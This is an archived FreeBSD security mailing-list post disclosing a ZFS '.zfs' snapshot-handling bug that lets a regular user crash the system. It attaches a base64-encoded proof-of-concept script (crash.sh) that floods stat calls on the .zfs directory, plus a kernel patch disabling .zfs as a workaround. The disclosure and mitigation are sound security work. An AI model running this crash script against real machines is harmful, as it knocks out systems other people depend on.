From owner-freebsd-security@FreeBSD.ORG Fri Jan 17 02:11:50 2014 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1 with cipher ADH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 5263E126; Fri, 17 Jan 2014 02:11:50 +0000 (UTC) Received: from pi.nmdps.net (pi.nmdps.net [109.61.102.5]) by mx1.freebsd.org (Postfix) with ESMTP id DEE161FFB; Fri, 17 Jan 2014 02:11:49 +0000 (UTC) Received: from pi.nmdps.net (pi.nmdps.net [109.61.102.5]) (Authenticated sender: krichy@cflinux.hu) by pi.nmdps.net (Postfix) with ESMTPSA id D16B3178C; Fri, 17 Jan 2014 03:11:47 +0100 (CET) Date: Fri, 17 Jan 2014 03:11:44 +0100 (CET) From: Richard Kojedzinszky X-X-Sender: krichy@pi.nmdps.net To: freebsd-fs@freebsd.org Subject: ZFS .zfs DoS Message-ID: User-Agent: Alpine 2.00 (BSF 1167 2008-08-23) MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="2628712688-1861051549-1389924707=:83798" X-Mailman-Approved-At: Fri, 17 Jan 2014 02:15:01 +0000 Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.17 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 17 Jan 2014 02:11:50 -0000 This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. --2628712688-1861051549-1389924707=:83798 Content-Type: TEXT/PLAIN; format=flowed; charset=US-ASCII Dear users, For a long time now I've been investigating problems relating FreeBSD ZFS .zfs handling, and found that I am not enough to fix issues. Until fixes arrive, unfortunately a regular user can DoS a FreeBSD system which has ZFS filesystems with the attached script. While the script expects a snapshot argument to be given, actually the first test case does not need that, only a mounted zfs filesystem is enough. For more of the tests a snapshot may be needed, and later ones need root account also. I would recommend that until this gets rewritten or fixed at all, one should disable access to .zfs at all with someting like I've attached. Regards, Kojedzinszky Richard --2628712688-1861051549-1389924707=:83798 Content-Type: TEXT/PLAIN; charset=US-ASCII; name=crash.sh Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename=crash.sh IyEvYmluL2Jhc2gNCg0Kc25hcHNob3Q9IiQxIg0KaWYgWyAteiAiJHNuYXBz aG90IiBdOyB0aGVuDQoJZWNobyAiRnJlZUJTRC9aRlMgc25hcHNob3QgaGFu ZGxpbmcgYnVnIg0KCWVjaG8gIiINCgllY2hvICJVc2FnZTogJDAgPHpmcyBz bmFwc2hvdD4iDQoJZXhpdCAxDQpmaQ0KDQpzbmFwc2hvdD0iJCh6ZnMgbGlz dCAtdCBzbmFwc2hvdCAtSCAtbyBuYW1lICIkc25hcHNob3QiKSINCmlmIFsg LXogIiRzbmFwc2hvdCIgXTsgdGhlbg0KCWVjaG8gIlNuYXBzaG90IG5vdCBm b3VuZCINCglleGl0IDINCmZpDQoNCmRhdGFzZXQ9IiR7c25hcHNob3QlQCp9 Ig0Kc249IiR7c25hcHNob3QjKkB9Ig0KbW91bnRwb2ludD0kKG1vdW50IHwg Z3JlcCAiXiRkYXRhc2V0W1s6c3BhY2U6XV0iIHwgYXdrICd7cHJpbnQgJDN9 JykNCg0KaWYgWyAhIC1kICIkbW91bnRwb2ludCIgXTsgdGhlbg0KCWVjaG8g IkNvdWxkIG5vdCBkZXRlcm1pbmUgbW91bnQgcG9pbnQgZm9yICRkYXRhc2V0 Ig0KCWV4aXQgMw0KZmkNCg0KZWNobyAiKiogZGF0YXNldD0kZGF0YXNldCBz bmFwbmFtZT0kc24gbW91bnRlZD0kbW91bnRwb2ludCINCg0KY2QgIiRtb3Vu dHBvaW50Ly56ZnMiDQp5ZXMgc25hcHNob3QgfCB4YXJncyBzdGF0ID4gL2Rl di9udWxsICYNCnllcyBzbmFwc2hvdCB8IHhhcmdzIHN0YXQgPiAvZGV2L251 bGwgJg0KDQojY2QgIiRtb3VudHBvaW50Ly56ZnMvc25hcHNob3QiDQojeWVz ICIkc24iIHwgeGFyZ3MgdW1vdW50ID4gL2Rldi9udWxsICYNCiN5ZXMgIiRz biIgfCB4YXJncyB1bW91bnQgPiAvZGV2L251bGwgJg0KI3llcyAiJG1vdW50 cG9pbnQvLnpmcy9zbmFwc2hvdC8kc24iIHwgeGFyZ3MgdW1vdW50ID4gL2Rl di9udWxsICYNCiN5ZXMgIiRtb3VudHBvaW50Ly56ZnMvc25hcHNob3QvJHNu IiB8IHhhcmdzIHVtb3VudCA+IC9kZXYvbnVsbCAmDQojeWVzICIkc24iIHwg eGFyZ3Mgc3RhdCA+IC9kZXYvbnVsbCAmDQojeWVzICIkc24iIHwgeGFyZ3Mg c3RhdCA+IC9kZXYvbnVsbCAmDQojeWVzICIkc24vLi4iIHwgeGFyZ3Mgc3Rh dCA+IC9kZXYvbnVsbCAmDQojeWVzICIkc24vLi4iIHwgeGFyZ3Mgc3RhdCA+ IC9kZXYvbnVsbCAmDQojeWVzICIuIiB8IHhhcmdzIGxzIC1sYSA+IC9kZXYv bnVsbCAmDQojeWVzICIuIiB8IHhhcmdzIGxzIC1sYSA+IC9kZXYvbnVsbCAm DQoNCiN5ZXMgIiRzbmFwc2hvdCIgfCB4YXJncyAtbiAxIHpmcyBzZW5kIC1S ID4gL2Rldi9udWxsICYNCg== --2628712688-1861051549-1389924707=:83798 Content-Type: TEXT/PLAIN; charset=US-ASCII; name=no_dot_zfs_at_all.patch Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename=no_dot_zfs_at_all.patch ZGlmZiAtLWdpdCBhL3N5cy9jZGRsL2NvbnRyaWIvb3BlbnNvbGFyaXMvdXRz L2NvbW1vbi9mcy96ZnMvemZzX3Zmc29wcy5jIGIvc3lzL2NkZGwvY29udHJp Yi9vcGVuc29sYXJpcy91dHMvY29tbW9uL2ZzL3pmcy96ZnNfdmZzb3BzLmMN CmluZGV4IDhlYjg5NTMuLjI3ZjQyYmQgMTAwNjQ0DQotLS0gYS9zeXMvY2Rk bC9jb250cmliL29wZW5zb2xhcmlzL3V0cy9jb21tb24vZnMvemZzL3pmc192 ZnNvcHMuYw0KKysrIGIvc3lzL2NkZGwvY29udHJpYi9vcGVuc29sYXJpcy91 dHMvY29tbW9uL2ZzL3pmcy96ZnNfdmZzb3BzLmMNCkBAIC0xMjI3LDggKzEy MjcsMTAgQEAgemZzX2RvbW91bnQodmZzX3QgKnZmc3AsIGNoYXIgKm9zbmFt ZSkNCiAJVkVSSUZZKFZGU19ST09UKHZmc3AsIExLX0VYQ0xVU0lWRSwgJnZw KSA9PSAwKTsNCiAJVk9QX1VOTE9DSyh2cCwgMCk7DQogDQorI2lmIDANCiAJ aWYgKCF6ZnN2ZnMtPnpfaXNzbmFwKQ0KIAkJemZzY3RsX2NyZWF0ZSh6ZnN2 ZnMpOw0KKyNlbmRpZg0KIG91dDoNCiAJaWYgKGVycm9yKSB7DQogCQlkbXVf b2Jqc2V0X2Rpc293bih6ZnN2ZnMtPnpfb3MsIHpmc3Zmcyk7DQpAQCAtMTk2 MCw4ICsxOTYyLDEwIEBAIHpmc191bW91bnQodmZzX3QgKnZmc3AsIGludCBm ZmxhZykNCiAJCQkJcmV0dXJuIChFQlVTWSk7DQogCQkJQVNTRVJUKHpmc3Zm cy0+el9jdGxkaXItPnZfY291bnQgPT0gMSk7DQogCQl9DQorI2lmIDANCiAJ CXpmc2N0bF9kZXN0cm95KHpmc3Zmcyk7DQogCQlBU1NFUlQoemZzdmZzLT56 X2N0bGRpciA9PSBOVUxMKTsNCisjZW5kaWYNCiAJfQ0KIA0KIAlpZiAoZmZs YWcgJiBNU19GT1JDRSkgew0KQEAgLTE5ODAsMTAgKzE5ODQsMTIgQEAgemZz X3Vtb3VudCh2ZnNfdCAqdmZzcCwgaW50IGZmbGFnKQ0KIAkgKi8NCiAJcmV0 ID0gdmZsdXNoKHZmc3AsIDEsIChmZmxhZyAmIE1TX0ZPUkNFKSA/IEZPUkNF Q0xPU0UgOiAwLCB0ZCk7DQogCWlmIChyZXQgIT0gMCkgew0KKyNpZiAwDQog CQlpZiAoIXpmc3Zmcy0+el9pc3NuYXApIHsNCiAJCQl6ZnNjdGxfY3JlYXRl KHpmc3Zmcyk7DQogCQkJQVNTRVJUKHpmc3Zmcy0+el9jdGxkaXIgIT0gTlVM TCk7DQogCQl9DQorI2VuZGlmDQogCQlyZXR1cm4gKHJldCk7DQogCX0NCiAN CkBAIC0yMDM0LDggKzIwNDAsMTAgQEAgemZzX3Vtb3VudCh2ZnNfdCAqdmZz cCwgaW50IGZmbGFnKQ0KIAkvKg0KIAkgKiBXZSBjYW4gbm93IHNhZmVseSBk ZXN0cm95IHRoZSAnLnpmcycgZGlyZWN0b3J5IG5vZGUuDQogCSAqLw0KKyNp ZiAwDQogCWlmICh6ZnN2ZnMtPnpfY3RsZGlyICE9IE5VTEwpDQogCQl6ZnNj dGxfZGVzdHJveSh6ZnN2ZnMpOw0KKyNlbmRpZg0KIAlpZiAoemZzdmZzLT56 X2lzc25hcCkgew0KIAkJdm5vZGVfdCAqc3ZwID0gdmZzcC0+bW50X3Zub2Rl Y292ZXJlZDsNCiANCg== --2628712688-1861051549-1389924707=:83798--